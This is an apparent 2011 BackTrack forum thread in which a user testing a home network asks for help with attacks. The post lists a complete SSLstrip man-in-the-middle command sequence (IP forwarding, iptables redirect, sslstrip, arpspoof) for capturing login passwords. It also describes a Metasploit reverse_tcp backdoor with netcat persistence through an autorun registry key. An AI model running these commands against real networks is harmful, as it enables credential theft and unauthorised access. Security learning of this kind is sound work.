Hi,
for netcat, try taking a look at the video section of the forum (3rd page at the bottom).
I did a test with BT5, and "we had opened a thread":
http://www.backtrack-linux.org/forum...ad.php?t=41488
bye!
Hey guys!
I'm new to Backtrack and so I'm facing some problems:
(I apply everything at home in my own network!)
SSLSTRIP:
I use the following commands:
- echo 1 > /proc/sys/net/ipv4/ip_forward
- iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 10000
- cd /pentest/web/sslstrip/
- python sslstrip.py -p -l 10000 -w /root/Desktop/capture.txt
- arpspoof -i eth0 -t <target ip> <gateway ip>
Backtrack is running on my mac with VMware!
If I sniff the HTTPS sites of the Mac, everything works nicely and I get the usernames and the passwords in plain text. But if I sniff my real Win XP (SP3) PC, sslstrip captures nonsense in the /root/Desktop/capture.txt file - I think it captures SSL-secured data!
That's strange, because if I open Facebook (on the Win XP machine) the URL shows HTTP and not HTTPS, so it should work. On the other hand, if I visit Gmail, or something else, the HTTPS is still there (I'm using sslstrip 0.9 - the Gmail bug should be gone).
Metasploit - backdooring:
I got into the Win XP machine with a hidden exploit in an .exe file with windows/meterpreter/reverse_tcp as PAYLOAD. Everything works perfectly - creating a session, uploading netcat (nc.exe), creating a new value in the autorun registry for the backdoor (nc) - until I reboot the remote PC. I can't connect with the command "nc <victim ip> <port>" any more.
I hope you know what to do.
Last edited by Stallh0f3n; 12-17-2011 at 01:33 PM.